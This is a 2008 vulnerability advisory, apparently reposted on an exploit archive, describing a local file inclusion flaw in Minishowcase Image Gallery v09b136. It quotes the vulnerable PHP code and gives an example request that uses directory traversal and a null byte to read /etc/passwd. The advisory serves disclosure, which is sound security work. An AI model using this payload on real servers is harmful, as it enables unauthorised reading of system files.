DSECRG-08-034.txt

DSECRG-08-034.txt: Posted Jul 29, 2008; Authored by Digital Security Research Group | Site dsecrg.com; Minishowcase Image Gallery version 09b136 suffers from a local file inclusion vulnerability.; tags | exploit, local, file inclusion; SHA-256 | 12b716582a9d712e7b0fba19e2b78105451225184214e0320152c8035a60de3a; Download | Favorite | View

DSECRG-08-034.txt


Digital Security Research Group [DSecRG] Advisory       #DSECRG-08-034


Application:                    Minishowcase Image Gallery      
Versions Affected:              v09b136
Vendor URL:                     http://minishowcase.frwrd.net
Bug:                            Local File Include
Exploits:                       YES
Reported:                       14.07.2008
Second report:                  22.07.2008
Vendor response:                NONE
Solution:                       NONE
Date of Public Advisory:        29.07.2008
Authors:                        Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***********

Minishowcase Image Gallery has local file include vulnerability in script libraries/general.init.php

Vulnerable GET parameters "lang".

Successful exploitation requires that "register_globals" is enabled.

Code
****
#################################################

...
        $_dir_file = dirname(dirname(__FILE__));
        $_dir_path = dirname($_SERVER["DOCUMENT_ROOT"] . $_SERVER['PHP_SELF']);
        
        if ($_dir_file != $_dir_path) {
                if (!isset($settings['minishowcase_url'])
                        || ($settings['minishowcase_url'] == "")) {
                        die ("<p style=\"margin:6px;padding:20px;text-align:left;font-size:18px;background:#f60;color:#FFF;\">ALERT: if you are including minishowcase with PHP into a website, please set the <code>\$minishowcase_url</code> variable in the <code>/config/settings.php</code> file</p>");
                }
        }
...
        if (isset($_GET["lang"])) $set_language = $_GET["lang"];
        $langfile = ROOT.'languages/'.$set_language.'.php';
        require_once($langfile);

#################################################

Example:

http://[server]/[installdir]/libraries/general.init.php?settings[minishowcase_url]=DSecRG&lang=../../../../../../../../../../../../../etc/passwd%00


Solution
********

No response or any updates from vendor.


About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact:    research [at] dsec [dot] ru
            http://www.dsec.ru (in Russian)

Top Authors In Last 30 Days

Red Hat 249 files
Jay Turla 150 files
indoushka 147 files
Ubuntu 62 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,118)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,071)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,733)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,808)
UNIX (9,452)
UnixWare (188)
Windows (6,763)
Other

DSECRG-08-034.txt

DSECRG-08-034.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

DSECRG-08-034.txt

Share This

DSECRG-08-034.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems